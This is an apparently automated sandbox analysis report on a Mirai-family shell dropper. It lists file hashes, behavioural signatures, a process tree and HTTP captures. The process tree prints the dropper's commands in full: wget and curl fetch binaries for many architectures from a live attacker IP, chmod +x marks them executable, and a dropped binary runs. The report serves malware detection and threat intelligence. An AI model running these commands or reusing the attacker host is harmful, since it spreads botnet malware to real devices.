Analysis
- max time kernel: 144s
- max time network: 145s
- platform: debian-9_armhf
- resource: debian9-armhf-20240729-en
- resource tags: arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 12/03/2025, 03:02 UTC
Static task: static1
Behavioral task: behavioral1
- Sample: 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
- Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
- Sample: 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
- Resource: debian9-armhf-20240729-en
Behavioral task: behavioral3
- Sample: 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
- Resource: debian9-mipsbe-20240611-en
General
- Target: 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
- Size: 2KB
- MD5: 62cb91c4ef22637c8ad25733622c1481
- SHA1: a71f4c34d11d81505a2dca56ce349d2e077b30aa
- SHA256: 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8
- SHA512: 2d033be2e64ec61c2f33c570c1cdab01da2dba5778ed65e69301c42858d0e6cd8d6f6faac86fdb14f5587225e3d49842d5401ef2102058b2c55c42e0e088d2e8
Malware Config
- Extracted: mirai (UNSTABLE)
Signatures
- Mirai family
- File and Directory Permissions Modification (1 TTPs, 13 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid / Process: 814 chmod; 822 chmod; 827 chmod; 833 chmod; 691 chmod; 705 chmod; 724 chmod; 742 chmod; 760 chmod; 769 chmod; 802 chmod; 808 chmod; 682 chmod
- Deletes itself (2 IoCs)
  pid / Process: 726 WTH; 770 WTH
- Executes dropped EXE (13 IoCs)
  ioc: /tmp/WTH; Process: 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
  pids: 683, 692, 707, 726, 743, 761, 770, 803, 809, 815, 823, 828, 834
- Modifies Watchdog functionality (1 TTPs, 4 IoCs)
  Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  File opened for modification by WTH: /dev/watchdog; /dev/misc/watchdog; /dev/watchdog; /dev/misc/watchdog
- Enumerates active TCP sockets (1 TTPs, 1 IoCs)
  Gets active TCP sockets from /proc virtual filesystem.
  File opened for reading by WTH: /proc/net/tcp
- Writes file to system bin folder (4 IoCs)
  File opened for modification by WTH: /sbin/watchdog; /bin/watchdog; /sbin/watchdog; /bin/watchdog
- YARA rule matches
  resource                          yara_rule
  behavioral2/files/fstream-1.dat   upx
  behavioral2/files/fstream-4.dat   upx
  behavioral2/files/fstream-5.dat   upx
  behavioral2/files/fstream-6.dat   upx
  behavioral2/files/fstream-7.dat   upx
- Changes its process name (2 IoCs)
  Changes the process name, possibly in an attempt to hide itself.
  ioc               pid  Process
  hrckt4d7c4db0klg  726  WTH
  b4bq6okmskj3      770  WTH
- Checks CPU configuration (1 TTPs, 13 IoCs)
  Checks CPU information which indicates whether the system is a virtual machine.
  File opened for reading by curl: /proc/cpuinfo (13 occurrences)
- Reads system network configuration (1 TTPs, 1 IoCs)
  Uses contents of /proc filesystem to enumerate network settings.
  File opened for reading by WTH: /proc/net/tcp
- Reads runtime system information (32 IoCs)
  File opened for reading by curl: /proc/sys/crypto/fips_enabled (13 occurrences)
  File opened for reading by curl: /proc/self/auxv (13 occurrences)
  File opened for reading by WTH: /proc/self/exe (4 occurrences)
  File opened for reading by WTH: /proc/self/maps (2 occurrences)
- System Network Configuration Discovery (1 TTPs, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid / Process: 686 wget; 689 curl; 690 cat
- Writes file to tmp directory (25 IoCs)
  Malware often drops required files in the /tmp directory.
  File opened for modification:
  ioc              Process
  /tmp/EdiAf.m68k  wget
  /tmp/EdiAf.i686  curl
  /tmp/EdiAf.sh4   wget
  /tmp/EdiAf.sh4   curl
  /tmp/EdiAf.x86   curl
  /tmp/EdiAf.mpsl  wget
  /tmp/EdiAf.ppc   curl
  /tmp/EdiAf.mips  curl
  /tmp/EdiAf.mpsl  curl
  /tmp/EdiAf.arm   wget
  /tmp/EdiAf.arm   curl
  /tmp/EdiAf.arm6  wget
  /tmp/EdiAf.arc   curl
  /tmp/EdiAf.x86   wget
  /tmp/EdiAf.mips  wget
  /tmp/EdiAf.arm5  wget
  /tmp/EdiAf.arm6  curl
  /tmp/EdiAf.arm7  wget
  /tmp/EdiAf.m68k  curl
  /tmp/EdiAf.spc   wget
  /tmp/EdiAf.spc   curl
  /tmp/WTH         99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
  /tmp/EdiAf.arm5  curl
  /tmp/EdiAf.arm7  curl
  /tmp/EdiAf.ppc   wget
Processes
- PID 652, level 1: /tmp/99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
  cmdline: /tmp/99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
  signatures: Executes dropped EXE; Writes file to tmp directory
- PID 654, level 2: /usr/bin/wget
  cmdline: wget http://78.40.117.13/EdiAf.x86
  signatures: Writes file to tmp directory
- PID 671, level 2: /usr/bin/curl
  cmdline: curl -O http://78.40.117.13/EdiAf.x86
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
- PID 680, level 2: /bin/cat
  cmdline: cat EdiAf.x86
- PID 682, level 2: /bin/chmod
  cmdline: chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  signatures: File and Directory Permissions Modification
- PID 683, level 2: /tmp/WTH
  cmdline: ./WTH pulse.selfrep
- PID 686, level 2: /usr/bin/wget
  cmdline: wget http://78.40.117.13/EdiAf.mips
  signatures: System Network Configuration Discovery; Writes file to tmp directory
- PID 689, level 2: /usr/bin/curl
  cmdline: curl -O http://78.40.117.13/EdiAf.mips
  signatures: Checks CPU configuration; Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
- PID 690, level 2: /bin/cat
  cmdline: cat EdiAf.mips
  signatures: System Network Configuration Discovery
- PID 691, level 2: /bin/chmod
  cmdline: chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.mips EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  signatures: File and Directory Permissions Modification
- PID 692, level 2: /tmp/WTH
  cmdline: ./WTH pulse.selfrep
- PID 694, level 2: /usr/bin/wget
  cmdline: wget http://78.40.117.13/EdiAf.mpsl
  signatures: Writes file to tmp directory
- PID 697, level 2: /usr/bin/curl
  cmdline: curl -O http://78.40.117.13/EdiAf.mpsl
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
- PID 704, level 2: /bin/cat
  cmdline: cat EdiAf.mpsl
- PID 705, level 2: /bin/chmod
  cmdline: chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  signatures: File and Directory Permissions Modification
- PID 707, level 2: /tmp/WTH
  cmdline: ./WTH pulse.selfrep
- PID 710, level 2: /usr/bin/wget
  cmdline: wget http://78.40.117.13/EdiAf.arm
  signatures: Writes file to tmp directory
- PID 716, level 2: /usr/bin/curl
  cmdline: curl -O http://78.40.117.13/EdiAf.arm
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
- PID 723, level 2: /bin/cat
  cmdline: cat EdiAf.arm
- PID 724, level 2: /bin/chmod
  cmdline: chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  signatures: File and Directory Permissions Modification
- PID 726, level 2: /tmp/WTH
  cmdline: ./WTH pulse.selfrep
  signatures: Deletes itself; Modifies Watchdog functionality; Writes file to system bin folder; Changes its process name; Reads runtime system information
- PID 728, level 2: /usr/bin/wget
  cmdline: wget http://78.40.117.13/EdiAf.arm5
  signatures: Writes file to tmp directory
- PID 734, level 2: /usr/bin/curl
  cmdline: curl -O http://78.40.117.13/EdiAf.arm5
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
- PID 741, level 2: /bin/cat
  cmdline: cat EdiAf.arm5
- PID 742, level 2: /bin/chmod
  cmdline: chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  signatures: File and Directory Permissions Modification
- PID 743, level 2: /tmp/WTH
  cmdline: ./WTH pulse.selfrep
  signatures: Reads runtime system information
- PID 744, level 2: /usr/bin/wget
  cmdline: wget http://78.40.117.13/EdiAf.arm6
  signatures: Writes file to tmp directory
- PID 753, level 2: /usr/bin/curl
  cmdline: curl -O http://78.40.117.13/EdiAf.arm6
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
- PID 759, level 2: /bin/cat
  cmdline: cat EdiAf.arm6
- PID 760, level 2: /bin/chmod
  cmdline: chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  signatures: File and Directory Permissions Modification
- PID 761, level 2: /tmp/WTH
  cmdline: ./WTH pulse.selfrep
  signatures: Reads runtime system information
- PID 762, level 2: /usr/bin/wget
  cmdline: wget http://78.40.117.13/EdiAf.arm7
  signatures: Writes file to tmp directory
- PID 763, level 2: /usr/bin/curl
  cmdline: curl -O http://78.40.117.13/EdiAf.arm7
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
- PID 767, level 2: /bin/cat
  cmdline: cat EdiAf.arm7
- PID 769, level 2: /bin/chmod
  cmdline: chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  signatures: File and Directory Permissions Modification
- PID 770, level 2: /tmp/WTH
  cmdline: ./WTH pulse.selfrep
  signatures: Deletes itself; Modifies Watchdog functionality; Enumerates active TCP sockets; Writes file to system bin folder; Changes its process name; Reads system network configuration; Reads runtime system information
- PID 798, level 2: /usr/bin/wget
  cmdline: wget http://78.40.117.13/EdiAf.ppc
  signatures: Writes file to tmp directory
- PID 800, level 2: /usr/bin/curl
  cmdline: curl -O http://78.40.117.13/EdiAf.ppc
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
- PID 801, level 2: /bin/cat
  cmdline: cat EdiAf.ppc
- PID 802, level 2: /bin/chmod
  cmdline: chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  signatures: File and Directory Permissions Modification
- PID 803, level 2: /tmp/WTH
  cmdline: ./WTH pulse.selfrep
- PID 805, level 2: /usr/bin/wget
  cmdline: wget http://78.40.117.13/EdiAf.m68k
  signatures: Writes file to tmp directory
- PID 806, level 2: /usr/bin/curl
  cmdline: curl -O http://78.40.117.13/EdiAf.m68k
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
- PID 807, level 2: /bin/cat
  cmdline: cat EdiAf.m68k
- PID 808, level 2: /bin/chmod
  cmdline: chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  signatures: File and Directory Permissions Modification
- PID 809, level 2: /tmp/WTH
  cmdline: ./WTH pulse.selfrep
- PID 811, level 2: /usr/bin/wget
  cmdline: wget http://78.40.117.13/EdiAf.spc
  signatures: Writes file to tmp directory
- PID 812, level 2: /usr/bin/curl
  cmdline: curl -O http://78.40.117.13/EdiAf.spc
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
- PID 813, level 2: /bin/cat
  cmdline: cat EdiAf.spc
- PID 814, level 2: /bin/chmod
  cmdline: chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  signatures: File and Directory Permissions Modification
- PID 815, level 2: /tmp/WTH
  cmdline: ./WTH pulse.selfrep
- PID 817, level 2: /usr/bin/wget
  cmdline: wget http://78.40.117.13/EdiAf.i686
- PID 819, level 2: /usr/bin/curl
  cmdline: curl -O http://78.40.117.13/EdiAf.i686
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
- PID 821, level 2: /bin/cat
  cmdline: cat EdiAf.i686
- PID 822, level 2: /bin/chmod
  cmdline: chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  signatures: File and Directory Permissions Modification
- PID 823, level 2: /tmp/WTH
  cmdline: ./WTH pulse.selfrep
- PID 824, level 2: /usr/bin/wget
  cmdline: wget http://78.40.117.13/EdiAf.sh4
  signatures: Writes file to tmp directory
- PID 825, level 2: /usr/bin/curl
  cmdline: curl -O http://78.40.117.13/EdiAf.sh4
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
- PID 826, level 2: /bin/cat
  cmdline: cat EdiAf.sh4
- PID 827, level 2: /bin/chmod
  cmdline: chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  signatures: File and Directory Permissions Modification
- PID 828, level 2: /tmp/WTH
  cmdline: ./WTH pulse.selfrep
- PID 830, level 2: /usr/bin/wget
  cmdline: wget http://78.40.117.13/EdiAf.arc
- PID 831, level 2: /usr/bin/curl
  cmdline: curl -O http://78.40.117.13/EdiAf.arc
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
- PID 832, level 2: /bin/cat
  cmdline: cat EdiAf.arc
- PID 833, level 2: /bin/chmod
  cmdline: chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arc EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  signatures: File and Directory Permissions Modification
- PID 834, level 2: /tmp/WTH
  cmdline: ./WTH pulse.selfrep
Network
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.x86 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "7a54-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 31316
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.x86 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "7a54-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 31316
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.mips HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "86dc-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 34524
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.mips HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "86dc-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 34524
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.mpsl HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "8c3c-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 35900
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.mpsl HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "8c3c-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 35900
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.arm HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "8314-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 33556
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.arm HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "8314-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 33556
-
Remote address: 8.8.8.8:53 (DNS; five exchanges with no request or response data recorded)
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.arm5 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "565c-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 22108
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.arm5 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "565c-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 22108
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.arm6 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "92e0-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 37600
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.arm6 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "92e0-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 37600
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.arm7 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "e5d8-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 58840
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.arm7 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "e5d8-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 58840
-
Remote address: 8.8.8.8:53
Request: dasdv1.service1921.club IN A
Response: dasdv1.service1921.club IN A 78.40.117.13
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.ppc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "7cac-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 31916
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.ppc HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "7cac-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 31916
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.m68k HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "12ff8-62fe79e8430d3"
Accept-Ranges: bytes
Content-Length: 77816
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.m68k HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "12ff8-62fe79e8430d3"
Accept-Ranges: bytes
Content-Length: 77816
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.spc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "12828-62fe79e8434bb"
Accept-Ranges: bytes
Content-Length: 75816
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.spc HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "12828-62fe79e8434bb"
Accept-Ranges: bytes
Content-Length: 75816
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.i686 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
Response:
HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS)
Content-Length: 208
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.i686 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
Response:
HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS)
Content-Length: 208
Content-Type: text/html; charset=iso-8859-1
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.sh4 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "10570-62fe79e8434bb"
Accept-Ranges: bytes
Content-Length: 66928
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.sh4 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "10570-62fe79e8434bb"
Accept-Ranges: bytes
Content-Length: 66928
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.arc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
Response:
HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS)
Content-Length: 207
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
Remote address: 78.40.117.13:80
Request:
GET /EdiAf.arc HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
Response:
HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS)
Content-Length: 207
Content-Type: text/html; charset=iso-8859-1
-
Traffic summary (per flow: traffic counters as recorded by the sandbox, HTTP request, HTTP response status)
- 1.2kB 32.8kB 19 23   HTTP Request: GET http://78.40.117.13/EdiAf.x86   HTTP Response: 200
- 1.0kB 32.9kB 18 27   HTTP Request: GET http://78.40.117.13/EdiAf.x86   HTTP Response: 200
- 1.1kB 36.3kB 19 29   HTTP Request: GET http://78.40.117.13/EdiAf.mips   HTTP Response: 200
- 1.2kB 36.0kB 21 25   HTTP Request: GET http://78.40.117.13/EdiAf.mips   HTTP Response: 200
- 1.4kB 37.7kB 23 29   HTTP Request: GET http://78.40.117.13/EdiAf.mpsl   HTTP Response: 200
- 1.5kB 37.7kB 27 30   HTTP Request: GET http://78.40.117.13/EdiAf.mpsl   HTTP Response: 200
- 1.4kB 35.3kB 24 29   HTTP Request: GET http://78.40.117.13/EdiAf.arm   HTTP Response: 200
- 1.3kB 35.0kB 22 23   HTTP Request: GET http://78.40.117.13/EdiAf.arm   HTTP Response: 200
- 180 B 3   (no HTTP request recorded)
- 1.0kB 23.2kB 16 16   HTTP Request: GET http://78.40.117.13/EdiAf.arm5   HTTP Response: 200
- 886 B 23.3kB 15 18   HTTP Request: GET http://78.40.117.13/EdiAf.arm5   HTTP Response: 200
- 1.4kB 39.2kB 24 26   HTTP Request: GET http://78.40.117.13/EdiAf.arm6   HTTP Response: 200
- 1.5kB 39.3kB 26 28   HTTP Request: GET http://78.40.117.13/EdiAf.arm6   HTTP Response: 200
- 1.8kB 61.3kB 30 42   HTTP Request: GET http://78.40.117.13/EdiAf.arm7   HTTP Response: 200
- 1.9kB 61.2kB 33 41   HTTP Request: GET http://78.40.117.13/EdiAf.arm7   HTTP Response: 200
- 1.1kB 926 B 20 17   (no HTTP request recorded)
- 1.2kB 33.4kB 19 24   HTTP Request: GET http://78.40.117.13/EdiAf.ppc   HTTP Response: 200
- 1.1kB 33.5kB 19 26   HTTP Request: GET http://78.40.117.13/EdiAf.ppc   HTTP Response: 200
